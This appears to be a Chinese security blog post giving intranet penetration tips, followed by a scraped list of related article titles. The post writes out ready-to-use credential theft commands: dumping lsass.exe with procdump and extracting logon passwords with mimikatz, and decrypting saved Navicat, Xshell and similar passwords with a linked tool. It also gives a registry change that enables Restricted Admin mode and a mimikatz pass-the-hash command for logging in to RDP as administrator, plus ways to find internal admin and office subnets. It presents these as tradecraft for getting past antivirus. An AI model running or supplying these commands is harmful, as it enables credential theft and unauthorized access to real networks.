声明:文中涉及到的技术和工具,仅供学习使用,禁止从事任何非法活动,如因此造成的直接或间接损失,均由使用者自行承担责任。

每周不定时持续分享各种干货。

众亦信安,中意你啊!

一.密码抓取


平常我们在内网中想要获取windows密码,但是又有杀软的情况下,使用mimikatz和cs自带的mimikatz就不一定能够抓取到密码了,肯定是要被拦截的,这我们就可以使用procdump+mimikatz进行机器上使用procdump导出一个dmp文件,然后将文件下载到本地使用mimikatz进行抓取密码。

procdump64.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

如何获取到navicat的明文密码?navicat我们所知是不支持查看明文密码的,这里我们可以使用SharpDecrypTPwd工具进行一个查看(不需要系统管理员权限)同时也支持抓取xshell、Teamviewer、FileZilla,SharpDecrypTPwd.exe -NavicatCrypto。

附上工具链接:https://github.com/RowTeam/SharpDecryptPwd

二:没有获取到管理员密码怎么登录管理员的账号


1.当我们控到服务器时,抓到了windows server2012或者其他版本密码时又无法解密,那该如何去进行登录administrator呢?
2.这里我们可以使用mimikatz将hash注入到我们的mstsc远程桌面连接中方法:在目标机器上添加注册表来开启Restricted Admin mode。

REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /

3.然后再使用mimikatz进行hash注入(管理员运行)

sekurlsa::pth /user:administrator /domain:192.16.1.1(注入的ip地址) /ntlm:031b1ddb76fc8c2e689e8436cbde9ea1(抓取到的ntlm) “/run:mstsc.exe /restrictedadmin”

4.然后再弹出来的mstsc窗口输入需要远程的ip地址就可以了

三:进入内网后怎么去获取办公网段


当获取到shell时候,这里我们肯定就是对服务器网端进行一个扫描和判断,但并不一会很清楚的去知道运维段和办公网段在哪里,如果直接对10/A段,172/b段去扫描肯定是流量很多很大,可能会导致一些结果进行丢失。

这里讲讲linux如何去判断运维段在那里,linux是会记录sshd连接记录和管理员正在连接状态的一个记录,所以我们在linux环境下去查看运维段就很方便了。

那如何去查看办公网段呢?一般获取web权限后,我们可以连接数据库去查看带有log的字段,里面一般会包含登录的ip日志,就是我们的办公段了。

内网渗透的一些tips相关推荐

  1. 内网渗透系列:横向渗透方法小结

    目录 前言 一.端口渗透 1.常见默认端口 (1)web类(web漏洞/敏感目录) (2)数据库类(扫描弱口令) (3)特殊服务类(未授权/命令执行类/漏洞) (4)常用端口类(扫描弱口令/端口爆破) ...

  2. 17、内网渗透测试定位技术总结

    0x01 前言 说起内网定位,无论针对内网查找资料还是针对特殊人物都是非常实用的一项技术.这里把目前能够利用的手段&工具都一一进行讲解. 0x02 服务器(机器)定位 收集域以及域内用户信息 ...

  3. Windos 内网渗透之Token的使用

    文章目录 内网渗透 Token 前言 AccessToken 的窃取与利用 incognito MSF 下的 incognito msfconsole 令牌实战 伪造令牌 进程窃取令牌 返回之前的 t ...

  4. kali扫描内网ip_来,我们聊聊内网渗透!

    文章来源:Admin Team 0x00 前言 前段时间再看 metasploit 和白帽子讲 Web 安全,就一直想自己搭个从 Web 端渗透进入内网的环境玩一下,不过因为不太懂计网的知识,拓扑图也 ...

  5. [原创]K8域控植入脚本生成器(内网渗透/RPC不可用解决方案)

    [原创]K8域控植入脚本生成器(内网渗透/RPC不可用解决方案) 参考文章: (1)[原创]K8域控植入脚本生成器(内网渗透/RPC不可用解决方案) (2)https://www.cnblogs.co ...

  6. 红蓝对抗 linux内网渗透

    目录 一.前言 二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三.隧道 3.1 SSH 3.2 nc/ncat 3.3 portmap ...

  7. 内网渗透测试:NTLM Relay攻击分析

    目录 基础知识 NTLM认证过程 NTLM中继攻击原理 获得Net-NTLM Relay的思路 利用LLMNR和NetBIOS欺骗获得Net-NTLMHash 利用WPAD劫持获得Net-NTLMHa ...

  8. 内网渗透测试:内网信息收集与上传下载

    在之前的几节中,我们讲了隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础. 可以说内网渗透测试,其本质就是信息收集.信息收集的深度,直接关系到内网渗透测试的成败 ...

  9. 安全学习概览——恶意软件分析、web渗透、漏洞利用和挖掘、内网渗透、IoT安全分析、区块链、黑灰产对抗...

    1 基础知识 1.1 网络 熟悉常见网络协议: https://www.ietf.org/standards/rfcs/ 1.2 操作系统 1.3 编程 2 恶意软件分析 2.1 分类 2.1.1 木 ...

最新文章

  1. 【FFmpeg】便捷函数汇总(持续更新中...)
  2. OC中创建对象,存入数组,并且遍历对象
  3. 无偏方差为什么除以n-1
  4. Python网络爬虫与信息提取(二):网络爬虫之提取
  5. boost::geometry::flatten_iterator用法的测试程序
  6. 45页的NAS神经网络搜索的综述,请查收!
  7. dbeaver导出建表语句_细致入微:如何使用数据泵导出表的部分列数据
  8. SAP Spartacus开启SSR服务器端渲染之后,和默认客户端渲染的差异比较
  9. Git操作失败并提示Another git process seems to be running in this......
  10. 一加7T Pro最新渲染图曝光:背部有小改动
  11. FCKeditor 上传图片和浏览服务器时提示请先登陆的解决办法
  12. 计算机网络课堂笔记3.29
  13. 页面之间传输大量数据
  14. 【Flink Forward Asia 2021】活动报告出炉,实时即未来!
  15. 为了永不停机的计算服务 | 凌云时刻
  16. 【qt+opencv】实现人脸识别打卡系统2.0
  17. 1、黑塞矩阵Hessian matrix
  18. icassp2021论文集下载
  19. 用计算机进行几何证明属于,湖南省计算机二级精选选择题1
  20. PHP月考---给自己建个错题本

热门文章

  1. 【网站架构】网站系统怎么才是安全的?安全验收?等保、网络安全、SQL盲注、https、鉴权
  2. 获取cookie的3种方式
  3. mysql union详解_MySQL 联合查询union详解-Fun言
  4. 大数据分析白酒基金走势,白酒还有戏吗?,为何明知道白酒跌还不停的入场填坑?
  5. 微信小程序商城、APP商城开发营销活动功能策划(拼团、砍价、秒杀、直播、优惠券等)
  6. 东华大学2021计算机考研,东华大学2021考研考试大纲:计算机及软件工程专业基础综合...
  7. MySQL数据库服务器密码不记得,找回数据库服务器密码
  8. 和誉医药与礼来达成全球合作和独家许可协议;瑞士制药公司接管BELEODAQ特别准入计划 | 医药健闻...
  9. 目前java导出word的6种解决方案
  10. 华为鸿蒙mate,魅族确定将接入鸿蒙;华为鸿蒙平板MatePad Pro官宣